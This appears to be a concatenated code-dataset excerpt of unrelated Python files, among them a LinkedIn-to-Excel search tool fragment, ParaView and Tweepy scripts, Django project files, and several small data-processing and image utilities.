book[book.sheetnames[1]] # On écrit sur la deuxième feuille du fichier excel\n else:\n sheet = book[book.sheetnames[0]] # Pardéfaut on écrit sur la première feuille\n\n new_row = sheet.max_row + 1\n colidx = self.get_excel_columnid(sheet)\n linkFont = Font(color=colors.BLUE, underline='single', name='Arial')\n for key in self.targetedInfo:\n if key in colidx.keys():\n if key == 'profil' or key == 'mail':\n sheet.cell(row=new_row, column=colidx[key]).hyperlink = infos[key]\n sheet.cell(row=new_row, column=colidx[key]).font = linkFont\n else:\n sheet.cell(row=new_row, column=colidx[key]).value = infos[key]\n\n book.save(self.chemin)\n status = 0\n except:\n self.c.update_statut_recherche.emit(\"L'écriture dans le fichier excel a rencontré un problème\")\n status = 1\n return status\n\n def get_excel_columnid(self, sh):\n \"\"\"\n Lis le fichier Excel et récupère les index des des différentes colonnes\n :param sh:\n \"\"\"\n # keywords = ['nom', 'fonction', 'société', 'tel', 'mail', 'profil', 'domain', 'localisation','site']\n colnumid = dict()\n for keyword in self.targetedInfo:\n colnumid.update({keyword: colnum for colnum in range(1, sh.max_column + 1) if\n self.supprime_accent(keyword).upper() in self.supprime_accent(\n str(sh.cell(row=1, column=colnum).value)).upper()})\n return colnumid\n\n\n def pause(self):\n \"\"\"\n Vérifie le statut de pauseflag et attend s'il est True\n :return:\n \"\"\"\n while self.pauseflag: # tant que progress.btn_pause préssé pauseflag = True\n self.c.update_statut_recherche.emit(\"Recherche mise en pause par l'utilisateur\")\n time.sleep(1) # tant que pauseflag = True on attend\n if self.continueflag is False: # pendant la pause, si le bouton STOP est préssé continueflag = False\n break # si continueflag = False on sort de la boucle\n\n def waiting_for(self, waitingfor):\n \"\"\"\n Wait until the waitingfor string is contained in the url\n \"\"\"\n while waitingfor not in self.browser.current_url:\n time.sleep(random.uniform(3.5, 6.9))\n\n def waiting_for2(self, waitingfor, timeout=5):\n \"\"\"\n Wait until the waitingfor string is contained in the url\n \"\"\"\n count = 0\n while waitingfor not in self.browser.current_url and count < timeout:\n count += 1\n # self.c.update_statut_recherche.emit(str(count))\n time.sleep(3)\n\n def wait_for_full_loading(self):\n \"\"\"\n Wait for Full loading\n :return:\n \"\"\"\n delay = 10\n error = 0\n try:\n self.browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n myElem = WebDriverWait(self.browser, delay).until(\n EC.presence_of_element_located((By.ID, 'expanded-footer')))\n # print('Page is ready!')\n except TimeoutException:\n self.c.update_statut_recherche.emit(\n 'La durée de connexion à la page est anormalement longue, vérifiez votre connexion')\n error = 1\n return error\n\n def supprime_accent(self, ligne):\n \"\"\" supprime les accents du texte source \"\"\"\n accents = {'a': ['à', 'ã', 'á', 'â', 'à'.upper(), 'ã'.upper(), 'á'.upper(), 'â'.upper()],\n 'e': ['é', 'è', 'ê', 'ë', 'é'.upper(), 'è'.upper(), 'ê'.upper(), 'ë'.upper()],\n 'i': ['î', 'ï', 'î'.upper(), 'ï'.upper()],\n 'u': ['ù', 'ü', 'û', 'ù'.upper(), 'ü'.upper(), 'û'.upper()],\n 'o': ['ô', 'ö', 'ô'.upper(), 'ö'.upper()],\n ' ': ['-', '_']}\n for (char, accented_chars) in accents.items():\n for accented_char in accented_chars:\n ligne = ligne.replace(accented_char, char)\n return ligne\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n dimScreen = app.desktop().screenGeometry()\n ui = UiMainWindow(dimScreen)\n sys.exit(app.exec_())\n","sub_path":"Linkedin_App.py","file_name":"Linkedin_App.py","file_ext":"py","file_size_in_byte":84191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629204417","text":"import pytest\nfrom labelbox.data.annotation_types.classification.classification import Checklist, ClassificationAnnotation, ClassificationAnswer, Radio\nfrom labelbox.data.annotation_types.geometry.point import Point\nfrom labelbox.data.annotation_types.geometry.rectangle import Rectangle\n\nfrom labelbox.data.annotation_types.video import VideoObjectAnnotation\n\n\n@pytest.fixture\ndef bbox_video_annotation_objects():\n bbox_annotation = [\n VideoObjectAnnotation(\n name=\"bbox\",\n keyframe=True,\n frame=13,\n segment_index=0,\n value=Rectangle(\n start=Point(x=146.0, y=98.0), # Top left\n end=Point(x=382.0, y=341.0), # Bottom right\n ),\n classifications=[\n ClassificationAnnotation(\n name='nested',\n value=Radio(answer=ClassificationAnswer(\n name='radio_option_1',\n classifications=[\n ClassificationAnnotation(\n name='nested_checkbox',\n value=Checklist(answer=[\n ClassificationAnswer(\n name='nested_checkbox_option_1'),\n ClassificationAnswer(\n name='nested_checkbox_option_2')\n ]))\n ])),\n )\n ]),\n VideoObjectAnnotation(\n name=\"bbox\",\n keyframe=True,\n frame=19,\n segment_index=0,\n value=Rectangle(\n start=Point(x=186.0, y=98.0), # Top left\n end=Point(x=490.0, y=341.0), # Bottom right\n ))\n ]\n\n return bbox_annotation\n","sub_path":"tests/integration/annotation_import/fixtures/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287612947","text":"#### import the simple module from the paraview\nfrom paraview.simple import *\n#### disable automatic camera reset on 'Show'\nparaview.simple._DisableFirstRenderCameraReset()\n\n# get active source.\ncylindervtk = GetActiveSource()\n\n# get active view\nrenderView1 = GetActiveViewOrCreate('RenderView')\n# uncomment following to set a specific view size\n# renderView1.ViewSize = [981, 819]\n\n# show data in view\ncylindervtkDisplay = Show(cylindervtk, renderView1)\n# trace defaults for the display properties.\ncylindervtkDisplay.ColorArrayName = [None, '']\ncylindervtkDisplay.DiffuseColor = [0.5000076295109483, 0.0, 0.5000076295109483]\ncylindervtkDisplay.BackfaceDiffuseColor = [0.5000076295109483, 0.0, 0.5000076295109483]\ncylindervtkDisplay.ScalarOpacityUnitDistance = 1.3249258044319845\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# set scalar coloring\nColorBy(cylindervtkDisplay, ('POINTS', 'Temp'))\n\n# rescale color and/or opacity maps used to include current data range\ncylindervtkDisplay.RescaleTransferFunctionToDataRange(True)\n\n# show color bar/color legend\ncylindervtkDisplay.SetScalarBarVisibility(renderView1, True)\n\n# get color transfer function/color map for 'Temp'\ntempLUT = GetColorTransferFunction('Temp')\n\n# get opacity transfer function/opacity map for 'Temp'\ntempPWF = GetOpacityTransferFunction('Temp')\n\n# change representation type\ncylindervtkDisplay.SetRepresentationType('Points')\n\n# change representation type\ncylindervtkDisplay.SetRepresentationType('Outline')\n\n# create a new 'Contour'\ncontour1 = Contour(Input=cylindervtk)\ncontour1.ContourBy = ['POINTS', 'AsH3']\ncontour1.Isosurfaces = [0.1326579]\ncontour1.PointMergeMethod = 'Uniform Binning'\n\n# show data in view\ncontour1Display = Show(contour1, renderView1)\n# trace defaults for the display properties.\ncontour1Display.ColorArrayName = ['POINTS', 'Temp']\ncontour1Display.DiffuseColor = [0.5000076295109483, 0.0, 0.5000076295109483]\ncontour1Display.LookupTable = tempLUT\ncontour1Display.BackfaceDiffuseColor = [0.5000076295109483, 0.0, 0.5000076295109483]\n\n# show color bar/color legend\ncontour1Display.SetScalarBarVisibility(renderView1, True)\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n#### saving camera placements for all active views\n\n# current camera placement for renderView1\nrenderView1.CameraPosition = [-49.26490111262243, 7.890473115421582, -3.7460106246471616]\nrenderView1.CameraFocalPoint = [0.0, 0.0, 0.07999992370605469]\nrenderView1.CameraViewUp = [0.14273026972457897, 0.9746616515350219, 0.17222872911152878]\nrenderView1.CameraParallelScale = 12.951115722667065\n\n#### uncomment the following to render all views\n# RenderAllViews()\n# alternatively, if you want to write images, you can use SaveScreenshot(...).","sub_path":"Code/ParaviewVisualizations/Trace Files/5_cylinder.py","file_name":"5_cylinder.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"382947272","text":"import os\nimport tweepy\nfrom dotenv import load_dotenv, find_dotenv\nfrom scripts import error_handler\n\n# Load environment settings.\nload_dotenv(find_dotenv())\n\nCONSUMER_KEY = os.getenv('CONSUMER_KEY')\nCONSUMER_SECRET = os.getenv('CONSUMER_SECRET')\nACCESS_TOKEN = os.getenv('ACCESS_TOKEN')\nACCESS_TOKEN_SECRET = os.getenv('ACCESS_TOKEN_SECRET')\n\n# Set up API.\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\n\n# Fetch lists we've been added to.\nlists = api.lists_memberships()\n\nfor entry in lists:\n try:\n creator_screen_name = entry.user.screen_name\n api.create_block(creator_screen_name)\n print('Blocked @{}, creator of \"{}\".'.format(creator_screen_name, entry.name))\n except Exception as e:\n # Return human readable error message on fail\n error_handler(e.api_code)\n","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"457734164","text":"import Muscle\nimport Weight\nimport MuscleTest\n\ndef main():\n biceps = Muscle.agonistMuscle(\"Biceps Bracii\", 20, 20, 2)\n MuscleTest.leafConstrucTest(biceps, \"Biceps Bracii\", 20, 20, 2)\n \n triceps = Muscle.antagonistMuscle(\"Triceps Bracii\", 33, 33, 4)\n MuscleTest.leafConstrucTest(triceps, \"Triceps Bracii\", 33,33,4)\n \n armMuscles = Muscle.muscleGroup(\"Upper Arm Muscles\")\n MuscleTest.compAddTest(armMuscles, biceps)\n MuscleTest.compAddTest(armMuscles, triceps)\n #armMuscles.addMuscle(biceps)\n #armMuscles.addMuscle(triceps)\n\n handWeight = Weight.weight(15)\n MuscleTest.moveWellTest(armMuscles, handWeight.weight)\n\n handWeight.addWeight(5)\n MuscleTest.moveDecentTest(armMuscles, handWeight.weight)\n\n handWeight.addWeight(10)\n MuscleTest.strainTest(armMuscles,handWeight.weight)\n\n\n '''print(\"\\nStart strength\")\n armMuscles.move(handWeight.weight)\n armMuscles.move(-handWeight.weight)\n\n print('\\n')\n Muscle.reps(armMuscles, 20, handWeight.weight)\n #Muscle.reps(armMuscles, 10, handWeight.weight)\n\n print(\"\\nEnd strength\")\n armMuscles.move(handWeight.weight)\n armMuscles.move(-handWeight.weight)\n print('\\n')'''\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Python/muscle/MuscleApp.py","file_name":"MuscleApp.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123869240","text":"import tkinter as tk\nimport tkinter.filedialog\nimport numpy as np\nfrom PIL import Image, ImageTk, ImageDraw\n\nnp.seterr('ignore')\n\nmax_width = 3000\nmax_height = 3000\n\n\ndef adapt_image(image):\n s = image.size\n if s[0] > max_width:\n ns = (int(max_width), int(s[1] * max_width / s[0]))\n image = image.resize(ns)\n s = image.size\n if s[1] > max_height:\n ns = (int(s[0] * max_height / s[1]), int(max_height))\n image = image.resize(ns)\n return image\n\n\nclass Win(tk.Frame):\n def __init__(self, root):\n super().__init__()\n self.root = root\n\n self.filename = tk.Entry()\n self.filename.insert(0,'index.jpg')\n self.filename.grid(row=0, column=0)\n\n self.x_field = tk.Entry()\n self.x_label = tk.Label(text=\"Start point (X, Y):\")\n self.x_label.grid(row=0, column=2)\n self.x_field.grid(row=0, column=3)\n\n self.y_field = tk.Entry()\n self.y_field.grid(row=0, column=4)\n\n tk.Button(text='file', command=self.open_file).grid(row=0, column=1)\n tk.Button(text='do', command=self.action).grid(row=0, column=5)\n tk.Button(text='clear', command=self.update_images).grid(row=0, column=6)\n\n self.miniature = 0\n self.processed = 0\n self.processed_miniature = 0\n\n self.open_image()\n self.proc(self.miniature)\n\n self.im = ImageTk.PhotoImage(self.miniature)\n self.iml = tk.Label(image=self.im, cursor='none')\n self.iml.bind(\"\", self.motion)\n self.iml.bind(\"\", self.action)\n self.iml.grid(row=1, column=0, columnspan=7, rowspan=1)\n\n def upd_xy(self, x, y):\n self.x_field.delete(0,tk.END)\n self.x_field.insert(0, str(x))\n self.y_field.delete(0,tk.END)\n self.y_field.insert(0, str(y))\n\n def motion(self, e):\n npim = np.array(self.processed)\n X,Y = npim.shape[:2]\n mx, my = e.y, e.x\n xs = slice(max(0, mx-10), min(X, mx+11))\n ys = slice(max(0, my-10), min(Y, my+11))\n\n glass = Image.fromarray(npim[xs,ys])\n glass = glass.resize((42,42))\n\n glass_draw = ImageDraw.Draw(glass)\n glass_draw.rectangle(((0,0), (41,41)), outline='red')\n glass_draw.rectangle(((20,20), (21,21)), outline='green')\n del glass_draw\n\n self.overlayed = Image.fromarray(npim)\n\n self.overlayed.paste(glass, (my-20, mx-20))\n\n self.overlayed_miniature = adapt_image(self.overlayed)\n self.im = ImageTk.PhotoImage(self.overlayed_miniature)\n self.iml.configure(image=self.im)\n self.upd_xy(mx, my)\n\n @staticmethod\n def in_size(grid, x, y):\n return x >= 0 and x < grid.shape[0] and y >= 0 and y < grid.shape[1]\n\n def _is_border(self, grid, x, y):\n result = Win.in_size(grid, x, y)\n if not result:\n return False\n L = [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1), (x - 1, y - 1), (x - 1, y + 1), (x + 1, y - 1),\n (x + 1, y + 1)]\n result = False\n for xy in L:\n result = result or Win.in_size(grid, *xy) and (not (np.all(grid[xy] == grid[x, y])))\n return result\n\n def do(self, grid, npim, x, y, color, used):\n print(used.shape)\n current = (x, y)\n prev = current\n while True:\n x, y = current\n used[x, y] = 1\n print(x, y)\n grid[x, y][0] = 255\n grid[x, y][1] = 0\n grid[x, y][2] = 0\n L = [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1), (x - 1, y - 1), (x - 1, y + 1), (x + 1, y - 1),\n (x + 1, y + 1)]\n for xy in L:\n if self._is_border(npim, *xy) and np.all(npim[xy] == color) and not used[xy]:\n current = xy\n break\n\n if prev == current:\n break\n prev = current\n\n def action(self, e=None):\n x = self.x_field.get()\n y = self.y_field.get()\n try:\n x = int(x)\n except:\n print(\"x value is not correct\")\n return\n try:\n y = int(y)\n except:\n print(\"y value is not correct\")\n return\n npim = np.array(self.image)\n if not self._is_border(npim, x, y):\n print(\"not border\")\n return\n print(\"border\")\n current = (x, y)\n color = (npim[current][0], npim[current][1], npim[current][2])\n print(color)\n grid = npim.copy()\n self.do(grid, npim, x, y, color, np.zeros_like(grid[:,:,0]))\n\n self.processed = Image.fromarray(grid)\n self.processed_miniature = adapt_image(self.processed)\n self.im = ImageTk.PhotoImage(self.processed_miniature)\n self.iml.configure(image=self.im)\n\n def open_file(self):\n fn = tk.filedialog.askopenfilename(initialdir='./images')\n self.filename.delete(0, tk.END)\n self.filename.insert(0, fn)\n self.update_images()\n\n def proc(self, img):\n npim = np.array(img)\n\n self.processed = Image.fromarray(npim)\n self.processed_miniature = adapt_image(self.processed)\n\n def update_images(self):\n self.open_image()\n self.proc(self.miniature)\n\n self.im = ImageTk.PhotoImage(self.miniature)\n self.iml.configure(image=self.im)\n\n def open_image(self):\n try:\n self.image = Image.open(self.filename.get()).convert('RGB')\n except:\n self.image = Image.new('RGB', (1,1))\n self.miniature = adapt_image(self.image)\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n w = Win(root)\n tk.mainloop()\n","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":5649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255504487","text":"# -*- coding: utf-8 -*-\n__author__ = 'Leo'\n\nimport numpy as np\nimport utils.files as uf\nimport utils.preprocess as upr\n\n\ndef classify_date(source_file):\n reader = uf.load_data_to_list(source_file)\n\n time_begin = np.datetime64('2008-02-03 08:00:00')\n time_end = np.datetime64('2008-02-03 08:30:00')\n\n (longitude_upper_limit, longitude_floor) = (117, 115.9)\n (latitude_upper_limit, latitude_floor) = (40.5, 39.5)\n\n arrays = []\n\n for arr in reader:\n time = np.datetime64(arr[1])\n longitude = float(arr[2])\n latitude = float(arr[3])\n if time >= time_begin and time < time_end and longitude <= longitude_upper_limit and \\\n longitude >= longitude_floor and latitude <= latitude_upper_limit and latitude >= latitude_floor:\n arrays.append(arr)\n\n return arrays\n\n\nif __name__ == '__main__':\n reader = classify_date('test\\\\data_preprocess.txt')\n # 是否去除重复,保留第一项\n # reader = upr.remove_repetition(reader, 0)\n uf.write_in_file('test\\\\classify_time.txt', reader)","sub_path":"examples/beijing_taxi_data/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"582900638","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# */AIPND-revision/intropyproject-classify-pet-images/get_pet_labels.py\n#\n# PROGRAMMER: Emily Kern\n# DATE CREATED: January 6, 2019\n# REVISED DATE: January 30, 2019\n# PURPOSE: Create the function get_pet_labels that creates the pet labels from\n# the image's filename. This function inputs:\n# - The Image Folder as image_dir within get_pet_labels function and\n# as in_arg.dir for the function call within the main function.\n# This function creates and returns the results dictionary as results_dic\n# within get_pet_labels function and as results within main.\n# The results_dic dictionary has a 'key' that's the image filename and\n# a 'value' that's a list. This list will contain the following item\n# at index 0 : pet image label (string).\n#\n# Imports python modules\nfrom os import listdir\nfrom os.path import splitext\n\n# makes for easier formatting for label\ndef prettify(name):\n new_name = ''\n formatter = splitext(name)[0]\n formatter = name.split(\"_\")\n for word in formatter:\n if word.isalpha(): # takes care if file has numbers or .jpg\n new_name += (word + ' ')\n new_name = (new_name.rstrip()).lower() # removes trailing white space and lowercases it\n return new_name\n\ndef get_pet_labels(image_dir):\n \"\"\"\n Creates a dictionary of pet labels (results_dic) based upon the filenames\n of the image files. These pet image labels are used to check the accuracy\n of the labels that are returned by the classifier function, since the\n filenames of the images contain the true identity of the pet in the image.\n Be sure to format the pet labels so that they are in all lower case letters\n and with leading and trailing whitespace characters stripped from them.\n (ex. filename = 'Boston_terrier_02259.jpg' Pet label = 'boston terrier')\n Parameters:\n image_dir - The (full) path to the folder of images that are to be\n classified by the classifier function (string)\n Returns:\n results_dic - Dictionary with 'key' as image filename and 'value' as a\n List. The list contains for following item:\n index 0 = pet image label (string)\n \"\"\"\n results_dic = {}\n images = listdir(image_dir)\n for image in images:\n if not image.startswith('.'): # hidden directories and files not allowed\n label = prettify(image)\n results_dic[image] = [label]\n return results_dic\n","sub_path":"intropyproject-classify-pet-images/get_pet_labels.py","file_name":"get_pet_labels.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"356298261","text":"import pandas as pd\nimport os\nimport numpy as np\nfrom numpy.distutils.misc_util import is_sequence\nfrom bs4 import BeautifulSoup # this is to extract info from the xml, if we use it in the end\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom PIL import Image\nimport json\nimport pickle\n\ndef plot_iou(num, input, test=False):\n fig, ax = plt.subplots(1)\n if test:\n identifier = \"Test\"\n print(identifier)\n img_tensor = imgs_test[num]\n annotation = annotations_test[num]\n prediction = preds_test[num]\n else:\n identifier = \"Train\"\n print(identifier)\n img_tensor = imgs[num]\n annotation = annotations[num]\n prediction = preds_train[num]\n\n img = img_tensor.cpu().data\n img = img[0, :, :]\n annotation_boxes = annotation[\"boxes\"].tolist()\n\n if local_mode:\n ax.imshow(img, cmap='gray')\n\n ix = 0\n for box in annotation[\"boxes\"]:\n xmin, ymin, xmax, ymax = box.tolist()\n value = annotation[\"labels\"][ix]\n img_id = annotation[\"image_id\"].item()\n file_name = master_csv.loc[img_id, :].image_path\n set = file_name.split(\"/\")[7]\n video = file_name.split(\"/\")[8]\n file_name = file_name.split(\"/\")[10]\n file_name = file_name[:-4]\n output_name = set + \"_\" + video + \"_\" + file_name + \"_\" + identifier\n text = Recode(value)\n colors = [\"r\", \"r\", \"r\"]\n rect = patches.Rectangle((xmin, ymin), (xmax - xmin), (ymax - ymin), linewidth=1,\n edgecolor=colors[value], facecolor='none')\n target_x = xmin\n target_y = ymin - 5\n ax.text(target_x, target_y, text, color=colors[value])\n ax.add_patch(rect)\n ix += 1\n\n ix = 0\n voc_iou = []\n print(\n f'{len(prediction[\"boxes\"])} prediction boxes made for {len(annotation[\"boxes\"])} actual boxes in {str(output_name)} for {identifier} with note {input} (INDEX {num})')\n for box in prediction[\"boxes\"]:\n xmin, ymin, xmax, ymax = box.tolist()\n\n iou_list = []\n for bound in annotation_boxes:\n a_xmin, a_ymin, a_xmax, a_ymax = bound\n xA = max(xmin, a_xmin)\n yA = max(ymin, a_ymin)\n xB = min(xmax, a_xmax)\n yB = min(ymax, a_ymax)\n interArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)\n p_area = (xmax - xmin + 1) * (ymax - ymin + 1)\n a_area = (a_xmax - a_xmin + 1) * (a_ymax - a_ymin + 1)\n iou = interArea / float(p_area + a_area - interArea)\n iou_list.append(iou)\n max_val = max(iou_list)\n voc_iou.append(max_val)\n\n max_ix = iou_list.index(max_val)\n map_dict = {max_ix: max_val}\n\n # iou_string = ', '.join((str(float) for float in iou_list))\n value = prediction[\"labels\"][ix]\n text = json.dumps(map_dict)\n colors = [\"r\", \"#00FF00\", \"#0000FF\"]\n rect = patches.Rectangle((xmin, ymin), (xmax - xmin), (ymax - ymin), linewidth=1,\n edgecolor=colors[value], facecolor='none')\n target_x = xmin\n target_y = ymin - 5\n ax.text(target_x, target_y, text, color=colors[value])\n ax.add_patch(rect)\n ix += 1\n\n if local_mode:\n plt.show()\n\n if len(voc_iou) == 0:\n mean_iou = 0\n print(f'No predictions made so Mean IOU: {mean_iou}')\n else:\n mean_iou = sum(voc_iou) / len(voc_iou)\n fp = voc_iou.count(0) / len(voc_iou) * 100\n bp = sum((i > 0 and i < 0.5) for i in voc_iou) / len(voc_iou) * 100\n gp = sum((i >= 0.5) for i in voc_iou) / len(voc_iou) * 100\n print(f'{fp} false positives (IOU = 0)')\n print(f'{bp} bad positives (0 < IOU < 0.5)')\n print(f'{gp} good positives (IOU >= 0.5)')\n print(f'Mean IOU: {mean_iou}')\n\n figname = output_name + \"_\" + input + \".png\"\n fig.savefig(file_output_path + figname)\n #print(f'Figure {figname} saved to {directory}.')","sub_path":"src/plot_iou.py","file_name":"plot_iou.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"415516365","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom . import models\n\n\n@admin.register(models.User)\nclass CustomUserAdmin(UserAdmin):\n\n ADMIN_FIELDS = UserAdmin.fieldsets\n COSTOM_FIELDS = (\n (\n \"CostomFields\",\n {\n \"fields\": (\n \"authority\",\n ),\n },\n ),\n )\n\n fieldsets = ADMIN_FIELDS + COSTOM_FIELDS\n\n list_display = (\n \"username\",\n \"first_name\",\n \"last_name\",\n \"email\",\n \"authority\",\n )\n","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"106116394","text":"\"\"\"project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url, include\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom django.views.generic.base import TemplateView\n\n# REST FRAMEWORK\nfrom rest_framework import routers\nfrom rest_framework.schemas import get_schema_view\nfrom users.views import UserViewSet\nfrom petgram.views import PostViewSet, CommentViewSet\n\n# REST REGISTRATION\nfrom rest_registration.api.views import (\n register,\n change_password\n)\n\n# SIMPLE JWT\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView,\n)\n\nadmin.site.site_header = \"Petgram Admin\"\nadmin.site.site_title = \"Petgram Admin Portal\"\nadmin.site.index_title = \"Welcome to Petgram Administration Portal\"\nadmin.site.site_url = \"/api/v1/\"\n\n# api router\nrouter = routers.DefaultRouter(trailing_slash=False)\nrouter.register(r\"users\", UserViewSet)\nrouter.register(r\"posts\", PostViewSet)\nrouter.register(r\"comments\", CommentViewSet)\n\n# jwt urls\n# http://domain.com/api/v1/token/...\n\nauth_urlpatterns = [\n path('/login', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('/refresh', TokenRefreshView.as_view(), name='token_refresh'),\n path('/change-password', change_password, name='change_password'),\n path('/register', register, name='register'),\n]\n\n# api docs urls\n# http://domain.com/api/v1/docs\n\napi_docs = [\n # Swagger\n path('', TemplateView.as_view(\n template_name='swagger.html',\n extra_context={'schema_url': 'openapi-schema'}\n ), name='swagger-ui'),\n\n # OpenAPI\n path('/openapi', get_schema_view(\n title=\"Petgram API docs\",\n description=\"SHM Development Challenge API\",\n version=\"1.0.0\",\n ), name='openapi-schema'),\n\n]\n\n# api urls\n# http://domain.com/api/v1/\n\napi_urlpatterns = [\n path('/', include(router.urls)),\n path('/accounts', include(auth_urlpatterns)),\n path('/docs', include(api_docs))\n]\n\n\n\n# http://domain.com/\nurlpatterns = [\n path('', admin.site.urls), # admin site urls\n path('api/v1', include(api_urlpatterns)), # api v1.0\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"341610710","text":"import os\nfrom configparser import ConfigParser\nBASE_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))),'config.ini')\nimport top.api\nconf = ConfigParser()\nconf.read(BASE_DIR)\n\n\n\n# req=top.api.JuItemsSearchRequest('http://127.0.0.1','8000')\n# req.set_app_info(top.appinfo(conf.get('taobao','appkey'),conf.get('taobao','secret')))\n# header = {\n# \t\"current_page\":1,\n# \t\"page_size\":20,\n# \t\"pid\":'',\n# \t\"postage\":True,\n# \t\"status\":2,\n# \t\"taobao_category_id\":'973700308',\n# \t\"word\":''\n# }\n# req.param_top_item_query=header\n# try:\n# \tresp= req.getResponse()\n# \tprint('',resp)\n# except Exception as e:\n# \tprint('error',e)\n\n\nreq=top.api.TbkUatmFavoritesGetRequest()\nreq.set_app_info(top.appinfo(conf.get('taobao','appkey'),conf.get('taobao','secret')))\n\nreq.page_no=1\nreq.page_size=20\nreq.fields=\"favorites_title,favorites_id,type\"\nreq.type=-1\nresp= req.getResponse()\nprint(resp)\n\n# try:\n# \tresp= req.getResponse()\n# \tprint(resp)\n# except Exception as e:\n# \tprint(e)","sub_path":"apps/sdk/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"529584341","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db import models\n\n# Custom\nfrom .constances import STATES_TASK, STATE_TASK_DEFAULT\nfrom lists.models import TaskList\n\n\nclass Task(models.Model):\n \"\"\"\n Task model\n \"\"\"\n name = models.CharField(\n max_length=200,\n verbose_name=u'Name'\n )\n description = models.CharField(\n max_length=200,\n verbose_name='Description'\n )\n tasklist = models.ForeignKey(\n TaskList,\n related_name='tasks',\n verbose_name='Task list'\n )\n state = models.CharField(\n choices=STATES_TASK,\n default=STATE_TASK_DEFAULT,\n max_length=200,\n verbose_name=u'State'\n )\n order = models.IntegerField(\n default=0,\n verbose_name=u'Order'\n )\n\n def __unicode__(self):\n return \"%s - %s\" % (self.name, self.state)\n\n class Meta:\n ordering = [\"-order\"]\n verbose_name = u'Task'\n verbose_name_plural = u'Tasks'\n\n @property\n def owner(self):\n \"\"\"\n Return the user that belong the list\n \"\"\"\n return self.tasklist.user\n","sub_path":"tasks/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"457594616","text":"#\n# Copyright 2017-2023 - Swiss Data Science Center (SDSC)\n# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and\n# Eidgenössische Technische Hochschule Zürich (ETHZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 